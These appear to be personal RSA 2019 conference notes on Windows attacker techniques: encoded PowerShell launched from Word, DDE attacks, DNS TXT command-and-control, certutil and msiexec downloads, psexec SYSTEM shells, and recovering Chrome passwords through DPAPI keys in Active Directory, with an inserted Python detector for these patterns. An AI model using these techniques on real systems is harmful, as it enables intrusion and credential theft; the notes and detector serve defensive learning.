Note: it’s crazy to me that MSWord.exe is able to launch PowerShell like this:
C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -encodedCommand $encodedcommand
RSA Notes
• McAfee – “only five organizations that paid the WannaCry ransom got their files back”
• McAfee – RDP credentials are on sale on the dark web for $10
• Economics of the attacker are driving ransomware, botnets, AD fraud ($250,000 per week!)
“The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim’s system regardless whether macros are enabled.”
Learn how to do this here:
https://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire/
• If a client can query an external DNS server, they can use nslookup to get base64 data from a DNS TXT record for C2 communication
• Using PowerShell to convert it from base64 to a .ps1
• Then using powershell -ec to run a base64-encoded string
• CVE 2018-8440 using MSIEXEC to bypass AppLocker (required downloading the executable via DNS)
• Paula used certutil to download 7zip (but she showed how WDATP blocks this)
• Only 2 out of the 200 companies Paula has worked with have disabled NTLMv2 and use Kerberos exclusively
• Paula recommends enabling SMB signing
• Paula ran a cmd shell as SYSTEM (psexec -i -s) so that she could dump service account passwords (services.msc)
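The living-off-the-land patterns in the notes above (an Office process launching PowerShell through a `\..\` path, `-encodedCommand`, nslookup TXT lookups, certutil and msiexec fetching files) all leave traces in process-creation telemetry. The following is an added triage example, not code from the page or from the presenters: it decodes `-encodedCommand` arguments (base64 of UTF-16LE text) and tags the other patterns over a handful of constructed sample events. The event field names (`parent`, `image`, `cmdline`) are an assumption modelled on what Sysmon Event ID 1 or an EDR records, and the sample command lines and hostnames are constructed.

```python
"""Triage process-creation events for living-off-the-land patterns.

Added example (not from the page). Field names and sample events are constructed
to resemble Sysmon Event ID 1 / EDR process-creation records.
"""
import base64
import re

# Office applications whose child shells deserve a second look.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msword.exe")
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")

# The documented spellings -e / -ec / -enc / -encodedcommand (case-insensitive),
# followed by a base64 token.
ENCODED_RE = re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})",
                        re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -encodedCommand payload as text, or None if absent/undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return a list of (tag, detail) findings for one process-creation event."""
    findings = []
    parent = basename(event["parent"])
    image = basename(event["image"])
    cmd = event["cmdline"]
    low = cmd.lower()

    if parent in OFFICE_PARENTS and image in SHELLS:
        findings.append(("office-spawned-shell", f"{parent} -> {image}"))
    # A parent-directory traversal in the image path is the trick from the note above.
    if "\\..\\" in event["image"].lower():
        findings.append(("parent-dir-traversal-in-image", event["image"]))
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append(("encoded-powershell", decoded))
    if "certutil" in low and any(f in low for f in ("-urlcache", "-decode", "-encode")):
        findings.append(("certutil-download-or-decode", cmd))
    if "msiexec" in low and re.search(r"https?://", low):
        findings.append(("msiexec-remote-package", cmd))
    if "nslookup" in low and re.search(r"-(?:type|q|querytype)=txt", low):
        findings.append(("dns-txt-lookup", cmd))
    return findings


def scan(events):
    """Map event index -> findings, omitting events with nothing to report."""
    return {i: f for i, f in ((i, analyze_event(e)) for i, e in enumerate(events)) if f}


def _enc(ps_text):
    """Build a constructed -encodedCommand token the way PowerShell expects it."""
    return base64.b64encode(ps_text.encode("utf-16-le")).decode("ascii")


# Constructed sample events; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\..\..\..\..\Windows"
              r"\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -encodedCommand " + _enc("Write-Host 'constructed sample'")},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c nslookup -type=txt records.example.invalid"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/tool.exe tool.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://example.invalid/package.msi"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},  # benign
]

if __name__ == "__main__":
    for i, findings in scan(SAMPLE_EVENTS).items():
        for tag, detail in findings:
            print(f"event {i}: {tag}: {detail}")
```

The decoder is the part worth keeping: reviewing `-encodedCommand` arguments in their decoded form is what turns an opaque base64 blob into something an analyst can read, and the same regex catches the `-e` and `-ec` shorthands that casual string matching on "encodedCommand" misses. The other rules are coarse and will need allow-listing for administrative tooling in a real environment.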
• Paula demonstrated a tool called chromepass.exe from Nirsoft that reveals Chrome passwords
• She showed how getting a certificate from AD allows you to decrypt end-users’ Chrome passwords
• The master keys are encrypted by MSDCC2 and the master keys are stored in a file, ex: “BK-Cquire” (this is the public key for the AD domain stored in the local file, which encrypts the Chrome passwords) and the private key is in Active Directory.
• All the tools she used are downloadable from cqu.re/sessionrsa2019 (pw: CQUREAcademy#123!)
• She warned that SharePoint’s profile service (and the AAD Connect service account) both have the ‘MS Directory Replicate All’ permission and therefore have enough permission to get the private key for DPAPI from AD.